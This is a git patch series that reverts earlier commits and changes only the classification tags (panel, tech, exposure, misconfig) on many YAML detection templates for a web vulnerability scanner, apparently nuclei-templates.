4f895bc991..91f81269da 100644 --- a/http/exposed-panels/temenos-t24-login.yaml +++ b/http/exposed-panels/temenos-t24-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"t24 sign in" - tags: panel,temenos + tags: panel,exposure,temenos http: - method: GET diff --git a/http/exposed-panels/wiren-board-webui.yaml b/http/exposed-panels/wiren-board-webui.yaml index 6a927be905..125f729dab 100644 --- a/http/exposed-panels/wiren-board-webui.yaml +++ b/http/exposed-panels/wiren-board-webui.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Wiren Board Web UI" - tags: panel,wiren + tags: panel,exposure,wiren http: - method: GET diff --git a/http/exposed-panels/yarn-manager-exposure.yaml b/http/exposed-panels/yarn-manager-exposure.yaml index c3411ea755..71db69a961 100644 --- a/http/exposed-panels/yarn-manager-exposure.yaml +++ b/http/exposed-panels/yarn-manager-exposure.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: low description: Apache YARN ResourceManager panel was detected. - tags: panel,apache,yarn + tags: panel,apache,yarn,exposure metadata: max-request: 1 From fb12f5241a4af1e2894cf17a19ef29df7a1f1276 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:14:21 -0700 Subject: [PATCH 212/609] revert df937f18b85cfd45c12ddcd22ff21b78f5843593 --- http/exposures/files/db-xml-file.yaml | 2 +- http/exposures/files/redmine-settings.yaml | 2 +- http/exposures/files/secrets-file.yaml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposures/files/db-xml-file.yaml b/http/exposures/files/db-xml-file.yaml index 4e260f8dce..4ff4a94109 100644 --- a/http/exposures/files/db-xml-file.yaml +++ b/http/exposures/files/db-xml-file.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: db,files,exposure + tags: misconfig,db,files,exposure http: - method: GET diff --git a/http/exposures/files/redmine-settings.yaml b/http/exposures/files/redmine-settings.yaml index 19a31dc7da..de32c35036 100644 --- a/http/exposures/files/redmine-settings.yaml +++ b/http/exposures/files/redmine-settings.yaml @@ -9,7 +9,7 @@ info: max-request: 3 verified: true google-query: intitle:"index of" "settings.yml" - tags: redmine,devops,files,exposure + tags: misconfig,redmine,devops,files,exposure http: - method: GET diff --git a/http/exposures/files/secrets-file.yaml b/http/exposures/files/secrets-file.yaml index 4f70612ba2..05038369d7 100644 --- a/http/exposures/files/secrets-file.yaml +++ b/http/exposures/files/secrets-file.yaml @@ -9,7 +9,7 @@ info: max-request: 4 verified: true google-query: intitle:"index of" "secrets.yml" - tags: cloud,devops,files,exposure + tags: cloud,devops,files,exposure,misconfig http: - method: GET From 862c0651abbf047b7e37a8e9671a7609ad07cd72 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:14:39 -0700 Subject: [PATCH 213/609] Revert "remove panel tag from technologies templates" This reverts commit d379d28ff6faf99bf8d53a698e8d657803f9c11b. --- http/technologies/catalog-creator-detect.yaml | 2 +- http/technologies/geo-webserver-detect.yaml | 2 +- http/technologies/hp-blade-admin-detect.yaml | 2 +- http/technologies/microstrategy-detect.yaml | 2 +- http/technologies/ntop-detect.yaml | 2 +- http/technologies/osquery-fleet-detect.yaml | 2 +- http/technologies/secui-waf-detect.yaml | 2 +- http/technologies/snipeit-panel.yaml | 2 +- http/technologies/sonicwall-email-security-detect.yaml | 2 +- http/technologies/swag-instance-default-page.yaml | 2 +- http/technologies/thinkcmf-detect.yaml | 2 +- http/technologies/tornado-server-login.yaml | 2 +- http/technologies/vmware/vmware-site-recovery-manager.yaml | 2 +- http/technologies/yeswiki-detect.yaml | 2 +- 14 files changed, 14 insertions(+), 14 deletions(-) diff --git a/http/technologies/catalog-creator-detect.yaml b/http/technologies/catalog-creator-detect.yaml index 0810e45fc9..0968811449 100644 --- a/http/technologies/catalog-creator-detect.yaml +++ b/http/technologies/catalog-creator-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 2 verified: true shodan-query: http.html:"powered by CATALOGcreator" - tags: tech,catalogcreater + tags: tech,catalogcreater,panel http: - method: GET diff --git a/http/technologies/geo-webserver-detect.yaml b/http/technologies/geo-webserver-detect.yaml index f6d0943b05..de247fb3e0 100644 --- a/http/technologies/geo-webserver-detect.yaml +++ b/http/technologies/geo-webserver-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"GeoWebServer" - tags: geowebserver,tech + tags: panel,geowebserver,tech http: - method: GET diff --git a/http/technologies/hp-blade-admin-detect.yaml b/http/technologies/hp-blade-admin-detect.yaml index 06578b4521..261a8f875e 100644 --- a/http/technologies/hp-blade-admin-detect.yaml +++ b/http/technologies/hp-blade-admin-detect.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"HP BladeSystem" - tags: hp,tech + tags: panel,hp,tech http: - method: GET diff --git a/http/technologies/microstrategy-detect.yaml b/http/technologies/microstrategy-detect.yaml index fb1299a6bb..4af8dcce45 100644 --- a/http/technologies/microstrategy-detect.yaml +++ b/http/technologies/microstrategy-detect.yaml @@ -5,7 +5,7 @@ info: author: philippedelteil,Retr02332 severity: info description: Detect if MicroStrategy instances exist in your URLS - tags: microstrategy,tech + tags: microstrategy,panel,tech metadata: max-request: 16 diff --git a/http/technologies/ntop-detect.yaml b/http/technologies/ntop-detect.yaml index 44c189d146..0fdc136b4e 100644 --- a/http/technologies/ntop-detect.yaml +++ b/http/technologies/ntop-detect.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"welcome to ntop" - tags: tech,ntop + tags: tech,ntop,panel http: - method: GET diff --git a/http/technologies/osquery-fleet-detect.yaml b/http/technologies/osquery-fleet-detect.yaml index e7eaa49faf..3b535db6f5 100644 --- a/http/technologies/osquery-fleet-detect.yaml +++ b/http/technologies/osquery-fleet-detect.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:-1529860313 - tags: fleet,osquery,tech + tags: panel,fleet,osquery,tech http: - method: GET diff --git a/http/technologies/secui-waf-detect.yaml b/http/technologies/secui-waf-detect.yaml index 6e260a4648..89f1ead87d 100644 --- a/http/technologies/secui-waf-detect.yaml +++ b/http/technologies/secui-waf-detect.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1101206929 - tags: tech,secui + tags: tech,panel,secui http: - method: GET diff --git a/http/technologies/snipeit-panel.yaml b/http/technologies/snipeit-panel.yaml index 936eadaf4e..ae9d618fb9 100644 --- a/http/technologies/snipeit-panel.yaml +++ b/http/technologies/snipeit-panel.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:431627549 - tags: snipeit,tech + tags: panel,snipeit,tech http: - method: GET diff --git a/http/technologies/sonicwall-email-security-detect.yaml b/http/technologies/sonicwall-email-security-detect.yaml index e02aceab25..312cf7db4a 100644 --- a/http/technologies/sonicwall-email-security-detect.yaml +++ b/http/technologies/sonicwall-email-security-detect.yaml @@ -12,7 +12,7 @@ info: reference: - https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html - https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/ - tags: tech,sonicwall + tags: tech,panel,sonicwall metadata: max-request: 1 diff --git a/http/technologies/swag-instance-default-page.yaml b/http/technologies/swag-instance-default-page.yaml index 576b154a7d..fd1fa66305 100644 --- a/http/technologies/swag-instance-default-page.yaml +++ b/http/technologies/swag-instance-default-page.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Welcome to your SWAG instance" - tags: tech + tags: panel,tech http: - method: GET diff --git a/http/technologies/thinkcmf-detect.yaml b/http/technologies/thinkcmf-detect.yaml index 8d1a2c78c6..643a08fce4 100644 --- a/http/technologies/thinkcmf-detect.yaml +++ b/http/technologies/thinkcmf-detect.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: thinkcmf,login,tech + tags: panel,thinkcmf,login,tech metadata: max-request: 1 diff --git a/http/technologies/tornado-server-login.yaml b/http/technologies/tornado-server-login.yaml index 1cf8264ce9..b980e316cb 100644 --- a/http/technologies/tornado-server-login.yaml +++ b/http/technologies/tornado-server-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Tornado - Login" - tags: tornado,tech + tags: panel,tornado,tech http: - method: GET diff --git a/http/technologies/vmware/vmware-site-recovery-manager.yaml b/http/technologies/vmware/vmware-site-recovery-manager.yaml index 2a7b4673b1..bef73f47a1 100644 --- a/http/technologies/vmware/vmware-site-recovery-manager.yaml +++ b/http/technologies/vmware/vmware-site-recovery-manager.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Welcome to VMware Site Recovery Manager" - tags: vmware,tech + tags: panel,vmware,tech http: - method: GET diff --git a/http/technologies/yeswiki-detect.yaml b/http/technologies/yeswiki-detect.yaml index 5108b205e2..b66435ea71 100644 --- a/http/technologies/yeswiki-detect.yaml +++ b/http/technologies/yeswiki-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"yeswiki" - tags: yeswiki,tech + tags: yeswiki,panel,tech http: - method: GET From be6b8fc55db99df42ee8b56f1c601fdc0aa49f0e Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:15:02 -0700 Subject: [PATCH 214/609] Revert "remove exposure tag from technologies templates" This reverts commit e1cc60a07421b9e77c8d2783856e70fe67086d21. --- http/technologies/json-server.yaml | 2 +- http/technologies/nimsoft-wasp.yaml | 2 +- http/technologies/puppetdb-detect.yaml | 2 +- http/technologies/puppetserver-detect.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/http/technologies/json-server.yaml b/http/technologies/json-server.yaml index 684fab66af..cee4cfcff5 100644 --- a/http/technologies/json-server.yaml +++ b/http/technologies/json-server.yaml @@ -9,7 +9,7 @@ info: max-request: 1 verified: true shodan-query: title:"JSON Server" - tags: devops,tech + tags: exposure,devops,tech http: - method: GET diff --git a/http/technologies/nimsoft-wasp.yaml b/http/technologies/nimsoft-wasp.yaml index 4102c8cc62..81bd555282 100644 --- a/http/technologies/nimsoft-wasp.yaml +++ b/http/technologies/nimsoft-wasp.yaml @@ -5,7 +5,7 @@ info: author: Nullfuzz severity: info description: Detect Nimsoft Wasp WebPage - tags: nimsoft,tech + tags: nimsoft,exposure,tech metadata: max-request: 1 diff --git a/http/technologies/puppetdb-detect.yaml b/http/technologies/puppetdb-detect.yaml index ac1b041f6c..260f0187c8 100644 --- a/http/technologies/puppetdb-detect.yaml +++ b/http/technologies/puppetdb-detect.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version - tags: puppet,tech + tags: puppet,tech,exposure metadata: max-request: 1 diff --git a/http/technologies/puppetserver-detect.yaml b/http/technologies/puppetserver-detect.yaml index fa1e5d9faa..3f00b0a062 100644 --- a/http/technologies/puppetserver-detect.yaml +++ b/http/technologies/puppetserver-detect.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://insinuator.net/2020/09/puppet-assessment-techniques/ - tags: tech,puppet + tags: tech,puppet,exposure metadata: max-request: 1 From 54cd50fbaa5aec17a37164203ce164b1145e04a1 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:18:31 -0700 Subject: [PATCH 215/609] revert bf2caee9b14411c80a147270eaee1dc45cd1d419 --- http/exposed-panels/acemanager-login.yaml | 2 +- http/exposed-panels/aerohive-netconfig-ui.yaml | 2 +- http/exposed-panels/alfresco-detect.yaml | 2 +- http/exposed-panels/cacti-panel.yaml | 2 +- http/exposed-panels/checkmk/checkmk-login.yaml | 2 +- http/exposed-panels/edgeos-login.yaml | 2 +- http/exposed-panels/extreme-netconfig-ui.yaml | 2 +- http/exposed-panels/fastapi-docs.yaml | 2 +- http/exposed-panels/fatpipe-mpvpn-panel.yaml | 2 +- http/exposed-panels/fatpipe-warp-panel.yaml | 2 +- http/exposed-panels/footprints-panel.yaml | 2 +- http/exposed-panels/gerapy-detect.yaml | 2 +- http/exposed-panels/hashicorp-consul-agent.yaml | 2 +- http/exposed-panels/hpe-system-management-login.yaml | 2 +- http/exposed-panels/kenesto-login.yaml | 2 +- http/exposed-panels/konga-panel.yaml | 2 +- http/exposed-panels/kubernetes-enterprise-manager.yaml | 2 +- http/exposed-panels/kubernetes-mirantis.yaml | 2 +- http/exposed-panels/lansweeper-login.yaml | 2 +- http/exposed-panels/linksys-wifi-login.yaml | 2 +- http/exposed-panels/mautic-crm-panel.yaml | 2 +- http/exposed-panels/netdata-dashboard-detected.yaml | 2 +- http/exposed-panels/roxy-fileman.yaml | 2 +- http/exposed-panels/skycaiji-admin-panel.yaml | 2 +- http/exposed-panels/slocum-login.yaml | 2 +- http/exposed-panels/spiderfoot.yaml | 2 +- http/exposed-panels/synology-rackstation-login.yaml | 2 +- http/exposed-panels/xds-amr-status.yaml | 2 +- http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml | 2 +- http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml | 2 +- 30 files changed, 30 insertions(+), 30 deletions(-) diff --git a/http/exposed-panels/acemanager-login.yaml b/http/exposed-panels/acemanager-login.yaml index fe92f2073c..d8381f6348 100644 --- a/http/exposed-panels/acemanager-login.yaml +++ b/http/exposed-panels/acemanager-login.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 fofa-query: app="ACEmanager" - tags: panel,login,acemanager + tags: panel,login,tech,acemanager http: - method: GET diff --git a/http/exposed-panels/aerohive-netconfig-ui.yaml b/http/exposed-panels/aerohive-netconfig-ui.yaml index 710cebb49a..cb1d502632 100644 --- a/http/exposed-panels/aerohive-netconfig-ui.yaml +++ b/http/exposed-panels/aerohive-netconfig-ui.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Aerohive NetConfig UI" - tags: panel,hiveos,aerohive + tags: panel,tech,hiveos,aerohive http: - method: GET diff --git a/http/exposed-panels/alfresco-detect.yaml b/http/exposed-panels/alfresco-detect.yaml index 7109e4830b..8901bdf5bc 100644 --- a/http/exposed-panels/alfresco-detect.yaml +++ b/http/exposed-panels/alfresco-detect.yaml @@ -9,7 +9,7 @@ info: - https://www.alfresco.com/ classification: cwe-id: CWE-200 - tags: alfresco,panel + tags: alfresco,tech,panel metadata: max-request: 1 diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index 8a370533ea..e2495f4876 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: cacti,login,panel + tags: tech,cacti,login,panel metadata: max-request: 2 diff --git a/http/exposed-panels/checkmk/checkmk-login.yaml b/http/exposed-panels/checkmk/checkmk-login.yaml index 2d521a195d..13b3b6e79d 100644 --- a/http/exposed-panels/checkmk/checkmk-login.yaml +++ b/http/exposed-panels/checkmk/checkmk-login.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: login,synology,rackstation,panel + tags: login,tech,synology,rackstation,panel metadata: max-request: 1 diff --git a/http/exposed-panels/edgeos-login.yaml b/http/exposed-panels/edgeos-login.yaml index 5df7f8e2e4..654d26597f 100644 --- a/http/exposed-panels/edgeos-login.yaml +++ b/http/exposed-panels/edgeos-login.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: login,edgeos,edgemax,panel + tags: login,tech,edgeos,edgemax,panel metadata: max-request: 1 diff --git a/http/exposed-panels/extreme-netconfig-ui.yaml b/http/exposed-panels/extreme-netconfig-ui.yaml index 04d9c70571..a066a4b876 100644 --- a/http/exposed-panels/extreme-netconfig-ui.yaml +++ b/http/exposed-panels/extreme-netconfig-ui.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: 'http.title:"Extreme NetConfig UI"' - tags: panel,hiveos,extreme + tags: panel,tech,hiveos,extreme http: - method: GET diff --git a/http/exposed-panels/fastapi-docs.yaml b/http/exposed-panels/fastapi-docs.yaml index ee4920c632..441e86017a 100644 --- a/http/exposed-panels/fastapi-docs.yaml +++ b/http/exposed-panels/fastapi-docs.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: fastapi,panel + tags: fastapi,tech,panel metadata: max-request: 3 diff --git a/http/exposed-panels/fatpipe-mpvpn-panel.yaml b/http/exposed-panels/fatpipe-mpvpn-panel.yaml index 14ddbfc2b1..410250d0ef 100644 --- a/http/exposed-panels/fatpipe-mpvpn-panel.yaml +++ b/http/exposed-panels/fatpipe-mpvpn-panel.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: fatpipe,panel + tags: tech,fatpipe,panel http: - method: GET diff --git a/http/exposed-panels/fatpipe-warp-panel.yaml b/http/exposed-panels/fatpipe-warp-panel.yaml index e3b320c4ce..0926568a94 100644 --- a/http/exposed-panels/fatpipe-warp-panel.yaml +++ b/http/exposed-panels/fatpipe-warp-panel.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: fatpipe,panel + tags: tech,fatpipe,panel http: - method: GET diff --git a/http/exposed-panels/footprints-panel.yaml b/http/exposed-panels/footprints-panel.yaml index 5cee16c9a3..6d19a3102d 100644 --- a/http/exposed-panels/footprints-panel.yaml +++ b/http/exposed-panels/footprints-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 2 verified: true shodan-query: title:"FootPrints Service Core Login" - tags: panel,footprints + tags: tech,panel,footprints http: - method: GET diff --git a/http/exposed-panels/gerapy-detect.yaml b/http/exposed-panels/gerapy-detect.yaml index 11db931c56..dea5de7a30 100644 --- a/http/exposed-panels/gerapy-detect.yaml +++ b/http/exposed-panels/gerapy-detect.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: gerapy,panel + tags: tech,gerapy,panel metadata: max-request: 1 diff --git a/http/exposed-panels/hashicorp-consul-agent.yaml b/http/exposed-panels/hashicorp-consul-agent.yaml index c0fb7e517f..227da1ea1a 100644 --- a/http/exposed-panels/hashicorp-consul-agent.yaml +++ b/http/exposed-panels/hashicorp-consul-agent.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: consul,api,panel + tags: tech,consul,api,panel metadata: max-request: 1 diff --git a/http/exposed-panels/hpe-system-management-login.yaml b/http/exposed-panels/hpe-system-management-login.yaml index d1c897b1da..f61bc60a0c 100644 --- a/http/exposed-panels/hpe-system-management-login.yaml +++ b/http/exposed-panels/hpe-system-management-login.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: hpe,panel + tags: hpe,tech,panel metadata: max-request: 1 diff --git a/http/exposed-panels/kenesto-login.yaml b/http/exposed-panels/kenesto-login.yaml index 806ec29a9b..64674b2c82 100644 --- a/http/exposed-panels/kenesto-login.yaml +++ b/http/exposed-panels/kenesto-login.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 fofa-query: 'app="kenesto"' - tags: login,kenesto,panel + tags: login,tech,kenesto,panel reference: - https://www.kenesto.com/ classification: diff --git a/http/exposed-panels/konga-panel.yaml b/http/exposed-panels/konga-panel.yaml index 0233af7a0c..8a15823e10 100644 --- a/http/exposed-panels/konga-panel.yaml +++ b/http/exposed-panels/konga-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: konga,oss,panel + tags: tech,konga,oss,panel metadata: max-request: 1 diff --git a/http/exposed-panels/kubernetes-enterprise-manager.yaml b/http/exposed-panels/kubernetes-enterprise-manager.yaml index 306a488958..147db9196f 100644 --- a/http/exposed-panels/kubernetes-enterprise-manager.yaml +++ b/http/exposed-panels/kubernetes-enterprise-manager.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 fofa-query: app="Kubernetes-Enterprise-Manager" - tags: kubernetes,panel + tags: tech,kubernetes,panel http: - method: GET diff --git a/http/exposed-panels/kubernetes-mirantis.yaml b/http/exposed-panels/kubernetes-mirantis.yaml index e392d8cf0a..7c2753d13c 100644 --- a/http/exposed-panels/kubernetes-mirantis.yaml +++ b/http/exposed-panels/kubernetes-mirantis.yaml @@ -14,7 +14,7 @@ info: verified: true shodan-query: http.html:"Mirantis Kubernetes Engine" fofa-query: app="Mirantis-Kubernetes-Engine" - tags: kubernetes,devops,kube,k8s,panel + tags: tech,kubernetes,devops,kube,k8s,panel http: - method: GET diff --git a/http/exposed-panels/lansweeper-login.yaml b/http/exposed-panels/lansweeper-login.yaml index c4631bd565..ffdb5c0e82 100644 --- a/http/exposed-panels/lansweeper-login.yaml +++ b/http/exposed-panels/lansweeper-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Lansweeper - Login" - tags: lansweeper,panel + tags: lansweeper,tech,panel http: - method: GET diff --git a/http/exposed-panels/linksys-wifi-login.yaml b/http/exposed-panels/linksys-wifi-login.yaml index f4b916e0a9..3c9831868c 100644 --- a/http/exposed-panels/linksys-wifi-login.yaml +++ b/http/exposed-panels/linksys-wifi-login.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Linksys Smart WI-FI" - tags: panel,linksys,iot + tags: tech,panel,linksys,iot http: - method: GET diff --git a/http/exposed-panels/mautic-crm-panel.yaml b/http/exposed-panels/mautic-crm-panel.yaml index f88142f2f2..7d306990b6 100644 --- a/http/exposed-panels/mautic-crm-panel.yaml +++ b/http/exposed-panels/mautic-crm-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: mautic,crm,panel + tags: tech,mautic,crm,panel metadata: max-request: 1 diff --git a/http/exposed-panels/netdata-dashboard-detected.yaml b/http/exposed-panels/netdata-dashboard-detected.yaml index c69562147c..707beb63e8 100644 --- a/http/exposed-panels/netdata-dashboard-detected.yaml +++ b/http/exposed-panels/netdata-dashboard-detected.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: 'Server: NetData Embedded HTTP Server' - tags: netdata,panel + tags: netdata,panel,tech http: - method: GET diff --git a/http/exposed-panels/roxy-fileman.yaml b/http/exposed-panels/roxy-fileman.yaml index da86568ad8..b8951767aa 100644 --- a/http/exposed-panels/roxy-fileman.yaml +++ b/http/exposed-panels/roxy-fileman.yaml @@ -13,7 +13,7 @@ info: max-request: 4 verified: true google-query: intitle:"Roxy file manager" - tags: fileupload,roxy,fileman,panel + tags: tech,fileupload,roxy,fileman,panel http: - method: GET diff --git a/http/exposed-panels/skycaiji-admin-panel.yaml b/http/exposed-panels/skycaiji-admin-panel.yaml index 913636798d..da64ab36cf 100644 --- a/http/exposed-panels/skycaiji-admin-panel.yaml +++ b/http/exposed-panels/skycaiji-admin-panel.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: panel,skycaiji + tags: panel,tech,skycaiji metadata: max-request: 1 diff --git a/http/exposed-panels/slocum-login.yaml b/http/exposed-panels/slocum-login.yaml index 673a5f6eff..c8e67da8ec 100644 --- a/http/exposed-panels/slocum-login.yaml +++ b/http/exposed-panels/slocum-login.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: panel,slocum + tags: panel,tech,slocum metadata: max-request: 1 diff --git a/http/exposed-panels/spiderfoot.yaml b/http/exposed-panels/spiderfoot.yaml index 4661f6f051..6528688dcb 100644 --- a/http/exposed-panels/spiderfoot.yaml +++ b/http/exposed-panels/spiderfoot.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: panel,login,spiderfoot + tags: panel,login,tech,spiderfoot metadata: max-request: 1 diff --git a/http/exposed-panels/synology-rackstation-login.yaml b/http/exposed-panels/synology-rackstation-login.yaml index 084c649c22..0c94022c1c 100644 --- a/http/exposed-panels/synology-rackstation-login.yaml +++ b/http/exposed-panels/synology-rackstation-login.yaml @@ -4,7 +4,7 @@ info: name: Synology RackStation Login Detect author: princechaddha severity: info - tags: login,synology,rackstation,panel + tags: login,tech,synology,rackstation,panel metadata: max-request: 1 diff --git a/http/exposed-panels/xds-amr-status.yaml b/http/exposed-panels/xds-amr-status.yaml index 50753824b4..46b5092600 100644 --- a/http/exposed-panels/xds-amr-status.yaml +++ b/http/exposed-panels/xds-amr-status.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: 'http.title:"XDS-AMR - status"' - tags: panel,xamr,xds + tags: panel,tech,xamr,xds http: - method: GET diff --git a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml index a63d770449..b4cf52424d 100644 --- a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"VMG1312-B10D" - tags: zyxel,modem,router,panel + tags: tech,zyxel,modem,router,panel http: - method: GET diff --git a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml index 29803e12ae..96b9b99c8e 100644 --- a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"VSG1432-B101" - tags: zyxel,modem,router,panel + tags: tech,zyxel,modem,router,panel http: - method: GET From 8a2ae08f842b326e5bd876fcc986b752ca41e46a Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:19:27 -0700 Subject: [PATCH 216/609] revert 6bd8403df2f14e484f567c31ce075acc7eb0647b --- http/exposures/logs/clockwork-php-page.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/logs/clockwork-php-page.yaml b/http/exposures/logs/clockwork-php-page.yaml index b8af24fe07..5f7ce80388 100644 --- a/http/exposures/logs/clockwork-php-page.yaml +++ b/http/exposures/logs/clockwork-php-page.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://twitter.com/damian_89_/status/1250721398747791360 - tags: clockwork,exposure + tags: tech,clockwork,exposure metadata: max-request: 1 From 7fe3be43ea6eeade94081332fcec12bb1ca95eca Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:25:44 -0700 Subject: [PATCH 217/609] revert 9921dfc33cc9e313cd51c7ba31829ce8a43e9915 --- http/exposed-panels/adminer-panel-detect.yaml | 2 +- http/exposed-panels/dzzoffice/dzzoffice-install.yaml | 2 +- http/exposed-panels/gryphon-login.yaml | 2 +- http/exposed-panels/laravel-filemanager.yaml | 2 +- http/exposed-panels/luci-login-detection.yaml | 2 +- http/exposed-panels/openbmcs-detect.yaml | 2 +- http/exposed-panels/opencpu-panel.yaml | 2 +- http/exposed-panels/sap-successfactors-detect.yaml | 2 +- http/exposed-panels/server-backup-login.yaml | 2 +- http/misconfiguration/ampps-dirlisting.yaml | 2 +- http/misconfiguration/apache/tomcat-pathnormalization.yaml | 2 +- http/misconfiguration/bootstrap-admin-panel-template.yaml | 2 +- http/misconfiguration/command-api-explorer.yaml | 2 +- http/misconfiguration/deos-openview-admin.yaml | 2 +- http/misconfiguration/dgraph-dashboard-exposure.yaml | 2 +- http/misconfiguration/exposed-service-now.yaml | 2 +- http/misconfiguration/installer/avideo-install.yaml | 2 +- http/misconfiguration/installer/circarlife-setup.yaml | 2 +- http/misconfiguration/installer/mcloud-installer.yaml | 2 +- http/misconfiguration/installer/openshift-installer-panel.yaml | 2 +- http/misconfiguration/installer/zenphoto-setup.yaml | 2 +- http/misconfiguration/iot-vdme-simulator.yaml | 2 +- http/misconfiguration/misconfigured-docker.yaml | 2 +- http/misconfiguration/nomad-jobs.yaml | 2 +- http/misconfiguration/oneinstack-control-center.yaml | 2 +- 